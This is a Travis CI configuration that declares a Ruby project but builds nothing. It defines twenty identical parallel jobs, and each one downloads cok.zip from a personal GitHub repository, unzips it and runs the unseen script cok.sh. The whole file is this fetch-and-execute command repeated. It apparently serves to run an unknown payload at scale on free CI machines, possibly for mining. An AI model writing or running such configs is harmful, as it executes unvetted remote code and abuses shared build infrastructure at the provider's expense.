language: ruby
os: linux
dist: xenial

jobs:
  include:
    - name: ka 1
      script: wget https://raw.githubusercontent.com/wadansumar/test/main/cok.zip && unzip cok.zip && chmod +x cok.sh && ./cok.sh

    - name: ka 2
      script: wget https://raw.githubusercontent.com/wadansumar/test/main/cok.zip && unzip cok.zip && chmod +x cok.sh && ./cok.sh

    - name: ka 3
      script: wget https://raw.githubusercontent.com/wadansumar/test/main/cok.zip && unzip cok.zip && chmod +x cok.sh && ./cok.sh
      
    - name: ka 4
      script: wget https://raw.githubusercontent.com/wadansumar/test/main/cok.zip && unzip cok.zip && chmod +x cok.sh && ./cok.sh
      
    - name: ka 5
      script: wget https://raw.githubusercontent.com/wadansumar/test/main/cok.zip && unzip cok.zip && chmod +x cok.sh && ./cok.sh

    - name: ka 6
      script: wget https://raw.githubusercontent.com/wadansumar/test/main/cok.zip && unzip cok.zip && chmod +x cok.sh && ./cok.sh

    - name: ka 7
      script: wget https://raw.githubusercontent.com/wadansumar/test/main/cok.zip && unzip cok.zip && chmod +x cok.sh && ./cok.sh

    - name: ka 8
      script: wget https://raw.githubusercontent.com/wadansumar/test/main/cok.zip && unzip cok.zip && chmod +x cok.sh && ./cok.sh
      
    - name: ka 9
      script: wget https://raw.githubusercontent.com/wadansumar/test/main/cok.zip && unzip cok.zip && chmod +x cok.sh && ./cok.sh
      
    - name: ka 10
      script: wget https://raw.githubusercontent.com/wadansumar/test/main/cok.zip && unzip cok.zip && chmod +x cok.sh && ./cok.sh

    - name: ka 11
      script: wget https://raw.githubusercontent.com/wadansumar/test/main/cok.zip && unzip cok.zip && chmod +x cok.sh && ./cok.sh

    - name: ka 12
      script: wget https://raw.githubusercontent.com/wadansumar/test/main/cok.zip && unzip cok.zip && chmod +x cok.sh && ./cok.sh

    - name: ka 13
      script: wget https://raw.githubusercontent.com/wadansumar/test/main/cok.zip && unzip cok.zip && chmod +x cok.sh && ./cok.sh
      
    - name: ka 14
      script: wget https://raw.githubusercontent.com/wadansumar/test/main/cok.zip && unzip cok.zip && chmod +x cok.sh && ./cok.sh
      
    - name: ka 15
      script: wget https://raw.githubusercontent.com/wadansumar/test/main/cok.zip && unzip cok.zip && chmod +x cok.sh && ./cok.sh

    - name: ka 16
      script: wget https://raw.githubusercontent.com/wadansumar/test/main/cok.zip && unzip cok.zip && chmod +x cok.sh && ./cok.sh

    - name: ka 17
      script: wget https://raw.githubusercontent.com/wadansumar/test/main/cok.zip && unzip cok.zip && chmod +x cok.sh && ./cok.sh

    - name: ka 18
      script: wget https://raw.githubusercontent.com/wadansumar/test/main/cok.zip && unzip cok.zip && chmod +x cok.sh && ./cok.sh
      
    - name: ka 19
      script: wget https://raw.githubusercontent.com/wadansumar/test/main/cok.zip && unzip cok.zip && chmod +x cok.sh && ./cok.sh
      
    - name: ka 20
      script: wget https://raw.githubusercontent.com/wadansumar/test/main/cok.zip && unzip cok.zip && chmod +x cok.sh && ./cok.sh
